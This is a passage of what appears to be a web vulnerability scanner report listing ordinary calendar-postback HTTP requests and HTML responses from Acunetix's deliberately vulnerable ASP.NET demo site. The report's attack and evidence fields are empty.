href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8205&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAAQ6eGUdoIZGRkT907YfFOKlkuMVmUmtEf%2BSVxdu8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK%2FqPf5CgK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w%2BPiH4MWljddDFTp3vm47uCy6NBOw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:38:35 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAAQ6eGUdoIZGRkT907YfFOKlkuMVmUmtEf+SVxdu8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK/qPf5CgK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w+PiH4MWljddDFTp3vm47uCy6NBOw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:White" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8562&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgDAu8wOatsIZGRkE%2FoM0NRVz1fYsJkCLfuBjQa2pZw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK0mciNBwK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMWg6eEtP7NjTj3uvueCqx9MOe4r4%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:34:16 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgDAu8wOatsIZGRkE/oM0NRVz1fYsJkCLfuBjQa2pZw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK0mciNBwK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMWg6eEtP7NjTj3uvueCqx9MOe4r4=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:White" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" 